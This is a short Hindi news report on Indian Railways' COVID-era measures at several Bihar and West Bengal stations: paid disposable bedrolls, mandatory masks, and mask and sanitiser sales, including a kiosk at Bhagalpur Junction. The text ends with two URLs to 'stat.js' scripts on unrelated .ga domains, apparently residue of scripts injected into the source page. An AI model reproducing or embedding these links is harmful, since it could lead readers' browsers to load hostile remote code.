बिहार के 4 रेलवे स्टेशनों पर रेलवे द्वारा नई व्यवस्था का ऐलान किया गया है जिनमे भागलपुर साहिबगंज जमालपुर सुल्तानगंज एवं पश्चिम बंगाल का मालदा टाउन रेलवे स्टेशन का चयन किया गया है। इस नई व्यवस्था के तहत रेलवे ने अपने यात्रियों को कोरोनावायरस से बचाने के लिए नई तरकीब अपनाई है।
फिलहाल एसी बोगियों में बेड रोल की व्यवस्था नहीं दी जा रही है। लेकिन आने वाले दिनों में कुछ रेलवे स्टेशनों पर डिस्पोजल बेड रोल की व्यवस्था शुरू हो जाएगी। इक्षुक यात्री पैसे देकर और बेड रोल खरीद सकेंगे। फिलहाल सभी श्रेणी के यात्रियों के लिए यात्रा के दौरान मास्क लगाना अति अनिवार्य है।
कोरोनावायरस संक्रमण को ध्यान में रखते हुए रेलवे द्वारा चिन्हित स्टेशनों के फूड स्टॉल पर स्नेक्स के साथ-साथ मास्क एवं सैनिटाइजर की बिक्री भी शुरू की जाएगी। भागलपुर जंक्शन पर नई तकनीक द्वारा विकसित कियोस्क मशीन लगाई जाएगी। इस मशीन में पैसे डाल कर यात्री मेडिकल संबंधित सामान जैसे मासिक सैनिटाइजर एवं अन्य उपकरण खरीद सकेंगे जिसकी कीमत की पूरी सूची मशीन के स्क्रीन पर दिखाई जाएगी। जरुरत के अनुसार यात्री कर सकते है खरीदारी।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms